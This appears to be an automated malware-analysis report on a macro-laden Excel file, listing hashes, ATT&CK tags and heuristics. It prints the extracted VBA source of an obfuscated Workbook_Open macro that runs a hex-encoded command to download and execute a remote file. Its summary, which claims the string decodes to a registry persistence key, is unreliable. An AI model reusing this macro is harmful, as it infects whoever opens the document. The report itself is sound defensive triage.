Office (OOXML) malware analysis — malicious · f3007600575cca1f

MALICIOUS

Office (OOXML)

139.3 KB Created: 2020-07-24 06:23:52 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-07

MD5: 249377ee8b5b4be7b650082422db87d2 SHA-1: 57aefb8c575b104417fcde52abdd44b797ea0ab5 SHA-256: f3007600575cca1f62f21c4698361fd33be002ea61c64ea82ca03afee1e0081b

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing a Workbook_Open macro that utilizes the Shell() function. This macro decodes a hex string, which is then executed as a command. The decoded string is reconstructed as 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy', indicating an attempt to establish persistence. The critical Shell() call and the Workbook_Open macro strongly suggest a malicious intent to execute arbitrary code.

Heuristics 5

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1532 bytes
SHA-256: `842b9a3e0b6779e08cb74e4d3ecdef0e07bc4445d858d6da70ee41dfbb2789e2`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Sub Workbook_Open() Dim asd As String Shell hello("808A813D4C803D8D8C94828F90858289894B8295823D4A829582809291868C8B8D8C898680963D7F968D7E90903D4A743D65868181828B3D4A808C8A8A7E8B813D458B82944A8C7F878280913D70969091828A4B6B82914B74827F608986828B91464B618C948B898C7E816386898245448591918D574C4C9494944B7E847E8F807E4B818C8B7E868B82904B8D914C4C91828A8D897E9182904C7F828297504C737E975F5F734B829582444941828B935771828A8D4844796C8B8274824B829582444658456B82944A6C7F878280913D4A808C8A3D70858289894B5E8D8D8986807E91868C8B464B7085828989629582809291824541828B935771828A8D4844796C8B8274824B8295824446") End Sub Function hello(hlole As String) Dim holle As Integer Dim i As Integer Dim holel holle = 11111 holel = "" For i = 1 To Len(hlole) Step 2 holel = holel + Chr(CLng("&H" & Mid(hlole, i, 2)) - 29) Next hello = holel End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	14336 bytes
SHA-256: `006a369a26c6f6d50af8d604a934c7fc3ed9916af4c1639d5f2432a01a13c8c2`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.